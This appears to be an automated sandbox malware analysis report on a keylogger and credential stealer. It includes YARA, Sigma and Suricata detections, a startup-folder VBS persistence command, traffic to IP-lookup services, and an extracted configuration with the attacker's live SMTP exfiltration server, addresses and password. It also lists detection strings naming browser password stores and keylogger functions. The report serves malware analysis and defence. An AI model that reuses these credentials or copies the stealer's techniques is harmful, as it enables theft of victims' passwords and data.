7.2.RegSvcs.exe.450e498.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c664:$a1: get_encryptedPassword 0x1c638:$a2: get_encryptedUsername 0x1c6fc:$a3: get_timePasswordChanged 0x1c614:$a4: get_passwordField 0x1c67a:$a5: set_encryptedPassword 0x1c447:$a7: get_logins 0x1b9b5:$a8: GetOutlookPasswords 0x1aec9:$a9: StartKeylogger 0x19923:$a10: KeyLoggerEventArgs 0x198f2:$a11: KeyLoggerEventArgsEventHandler 0x1c51b:$a13: _encryptedPassword
7.2.RegSvcs.exe.450e498.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20d53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20251:$a3: \Google\Chrome\User Data\Default\Login Data 0x2055f:$a4: \Orbitum\User Data\Default\Login Data 0x21357:$a5: \Kometa\User Data\Default\Login Data
2.2.definitiveness.exe.10c0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C2 88 44 24 2B 88 44 24 2F B0 79 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
3.2.RegSvcs.exe.2c119ee.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.2c119ee.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.2c119ee.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.2c119ee.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2c119ee.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a864:$a1: get_encryptedPassword 0x1a838:$a2: get_encryptedUsername 0x1a8fc:$a3: get_timePasswordChanged 0x1a814:$a4: get_passwordField 0x1a87a:$a5: set_encryptedPassword 0x1a647:$a7: get_logins 0x19bb5:$a8: GetOutlookPasswords 0x190c9:$a9: StartKeylogger 0x17b23:$a10: KeyLoggerEventArgs 0x17af2:$a11: KeyLoggerEventArgsEventHandler 0x1a71b:$a13: _encryptedPassword
3.2.RegSvcs.exe.2c119ee.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1ef53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e451:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e75f:$a4: \Orbitum\User Data\Default\Login Data 0x1f557:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.2c119ee.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.2c119ee.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.2c119ee.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.2c119ee.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2c119ee.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c664:$a1: get_encryptedPassword 0x1c638:$a2: get_encryptedUsername 0x1c6fc:$a3: get_timePasswordChanged 0x1c614:$a4: get_passwordField 0x1c67a:$a5: set_encryptedPassword 0x1c447:$a7: get_logins 0x1b9b5:$a8: GetOutlookPasswords 0x1aec9:$a9: StartKeylogger 0x19923:$a10: KeyLoggerEventArgs 0x198f2:$a11: KeyLoggerEventArgsEventHandler 0x1c51b:$a13: _encryptedPassword
3.2.RegSvcs.exe.2c119ee.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20d53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20251:$a3: \Google\Chrome\User Data\Default\Login Data 0x2055f:$a4: \Orbitum\User Data\Default\Login Data 0x21357:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.44e6560.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.44e6560.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.44e6560.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.44e6560.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.44e6560.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c664:$a1: get_encryptedPassword 0x4459c:$a1: get_encryptedPassword 0x1c638:$a2: get_encryptedUsername 0x44570:$a2: get_encryptedUsername 0x1c6fc:$a3: get_timePasswordChanged 0x44634:$a3: get_timePasswordChanged 0x1c614:$a4: get_passwordField 0x4454c:$a4: get_passwordField 0x1c67a:$a5: set_encryptedPassword 0x445b2:$a5: set_encryptedPassword 0x1c447:$a7: get_logins 0x4437f:$a7: get_logins 0x1b9b5:$a8: GetOutlookPasswords 0x438ed:$a8: GetOutlookPasswords 0x1aec9:$a9: StartKeylogger 0x42e01:$a9: StartKeylogger 0x19923:$a10: KeyLoggerEventArgs 0x4185b:$a10: KeyLoggerEventArgs 0x198f2:$a11: KeyLoggerEventArgsEventHandler 0x4182a:$a11: KeyLoggerEventArgsEventHandler 0x1c51b:$a13: _encryptedPassword
7.2.RegSvcs.exe.44e6560.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20d53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48c8b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20251:$a3: \Google\Chrome\User Data\Default\Login Data 0x48189:$a3: \Google\Chrome\User Data\Default\Login Data 0x2055f:$a4: \Orbitum\User Data\Default\Login Data 0x48497:$a4: \Orbitum\User Data\Default\Login Data 0x21357:$a5: \Kometa\User Data\Default\Login Data 0x4928f:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.44e5678.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.44e5678.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.44e5678.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.44e5678.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.44e5678.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d54c:$a1: get_encryptedPassword 0x45484:$a1: get_encryptedPassword 0x1d520:$a2: get_encryptedUsername 0x45458:$a2: get_encryptedUsername 0x1d5e4:$a3: get_timePasswordChanged 0x4551c:$a3: get_timePasswordChanged 0x1d4fc:$a4: get_passwordField 0x45434:$a4: get_passwordField 0x1d562:$a5: set_encryptedPassword 0x4549a:$a5: set_encryptedPassword 0x1d32f:$a7: get_logins 0x45267:$a7: get_logins 0x1c89d:$a8: GetOutlookPasswords 0x447d5:$a8: GetOutlookPasswords 0x1bdb1:$a9: StartKeylogger 0x43ce9:$a9: StartKeylogger 0x1a80b:$a10: KeyLoggerEventArgs 0x42743:$a10: KeyLoggerEventArgs 0x1a7da:$a11: KeyLoggerEventArgsEventHandler 0x42712:$a11: KeyLoggerEventArgsEventHandler 0x1d403:$a13: _encryptedPassword
7.2.RegSvcs.exe.44e5678.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21c3b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49b73:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21139:$a3: \Google\Chrome\User Data\Default\Login Data 0x49071:$a3: \Google\Chrome\User Data\Default\Login Data 0x21447:$a4: \Orbitum\User Data\Default\Login Data 0x4937f:$a4: \Orbitum\User Data\Default\Login Data 0x2223f:$a5: \Kometa\User Data\Default\Login Data 0x4a177:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.450e498.4.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.450e498.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.450e498.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.450e498.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
7.2.RegSvcs.exe.450e498.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a864:$a1: get_encryptedPassword 0x1a838:$a2: get_encryptedUsername 0x1a8fc:$a3: get_timePasswordChanged 0x1a814:$a4: get_passwordField 0x1a87a:$a5: set_encryptedPassword 0x1a647:$a7: get_logins 0x19bb5:$a8: GetOutlookPasswords 0x190c9:$a9: StartKeylogger 0x17b23:$a10: KeyLoggerEventArgs 0x17af2:$a11: KeyLoggerEventArgsEventHandler 0x1a71b:$a13: _encryptedPassword
7.2.RegSvcs.exe.450e498.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1ef53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e451:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e75f:$a4: \Orbitum\User Data\Default\Login Data 0x1f557:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.2e60ee8.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.2e60ee8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.2e60ee8.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.2e60ee8.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2e60ee8.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1a864:$a1: get_encryptedPassword 0x1a838:$a2: get_encryptedUsername 0x1a8fc:$a3: get_timePasswordChanged 0x1a814:$a4: get_passwordField 0x1a87a:$a5: set_encryptedPassword 0x1a647:$a7: get_logins 0x19bb5:$a8: GetOutlookPasswords 0x190c9:$a9: StartKeylogger 0x17b23:$a10: KeyLoggerEventArgs 0x17af2:$a11: KeyLoggerEventArgsEventHandler 0x1a71b:$a13: _encryptedPassword
3.2.RegSvcs.exe.2e60ee8.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1ef53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e451:$a3: \Google\Chrome\User Data\Default\Login Data 0x1e75f:$a4: \Orbitum\User Data\Default\Login Data 0x1f557:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.2c10b06.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegSvcs.exe.2c10b06.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.2c10b06.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.2c10b06.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.RegSvcs.exe.2c10b06.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b74c:$a1: get_encryptedPassword 0x1b720:$a2: get_encryptedUsername 0x1b7e4:$a3: get_timePasswordChanged 0x1b6fc:$a4: get_passwordField 0x1b762:$a5: set_encryptedPassword 0x1b52f:$a7: get_logins 0x1aa9d:$a8: GetOutlookPasswords 0x19fb1:$a9: StartKeylogger 0x18a0b:$a10: KeyLoggerEventArgs 0x189da:$a11: KeyLoggerEventArgsEventHandler 0x1b603:$a13: _encryptedPassword
3.2.RegSvcs.exe.2c10b06.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1fe3b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f339:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f647:$a4: \Orbitum\User Data\Default\Login Data 0x2043f:$a5: \Kometa\User Data\Default\Login Data
Click to see the 93 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs" , ProcessId: 6824, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs" , ProcessId: 6824, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe, ProcessId: 6632, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T20:04:02.931895+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49710	132.226.8.169	80	TCP
2025-01-10T20:04:13.635166+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49713	132.226.8.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 7.2.RegSvcs.exe.5ab0000.5.raw.unpack

Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "sendxpreview@ypcog.shop", "Password": "k4T*5ia*ES", "Server": "ypcog.shop", "To": "preview@ypcog.shop", "Port": 587}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Virustotal: Detection: 73%			Perma Link

Multi AV Scanner detection for submitted file

Source: CvzLvta2bG.exe	Virustotal: Detection: 73%			Perma Link
Source: CvzLvta2bG.exe	ReversingLabs: Detection: 76%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: CvzLvta2bG.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: CvzLvta2bG.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.12:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.12:49715 version: TLS 1.0

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3598882957.0000000003189000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: definitiveness.exe, 00000002.00000003.2371130161.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, definitiveness.exe, 00000002.00000003.2372727166.0000000003950000.00000004.00001000.00020000.00000000.sdmp, definitiveness.exe, 00000006.00000003.2487622376.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, definitiveness.exe, 00000006.00000003.2486225217.0000000003C80000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: definitiveness.exe, 00000002.00000003.2371130161.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, definitiveness.exe, 00000002.00000003.2372727166.0000000003950000.00000004.00001000.00020000.00000000.sdmp, definitiveness.exe, 00000006.00000003.2487622376.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, definitiveness.exe, 00000006.00000003.2486225217.0000000003C80000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E6445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00E6445A
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E6C6D1 FindFirstFileW,FindClose,	0_2_00E6C6D1
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00E6C75C
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00E6EF95
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00E6F0F2
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00E6F3F3
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00E637EF
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00E63B12
Source: C:\Users\user\Desktop\CvzLvta2bG.exe	Code function: 0_2_00E6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00E6BCBC
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0066445A GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0066445A
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0066C6D1 FindFirstFileW,FindClose,	2_2_0066C6D1
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0066C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_0066C75C
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0066EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0066EF95
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0066F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0066F0F2
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0066F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0066F3F3
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_006637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_006637EF
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_00663B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00663B12
Source: C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe	Code function: 2_2_0066BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0066BCBC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h		3_2_02DADCF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h		7_2_02FEDCF0

Source: global traffic

TCP traffic: 192.168.2.12:61852 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49710 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49713 -> 132.226.8.169:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.12:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.12:49715 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\CvzLvta2bG.exe

Code function: 0_2_00E722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00E722EE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: RegSvcs.exe, 00000003.00000002.3599413554.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.00000000035CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000003.00000002.3599413554.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3599413554.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.00000000035CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.00000000035BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.3599413554.0000000003049000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.0000000003549000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000003.00000002.3599413554.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.3599413554.0000000003088000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3599294917.0000000003549000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
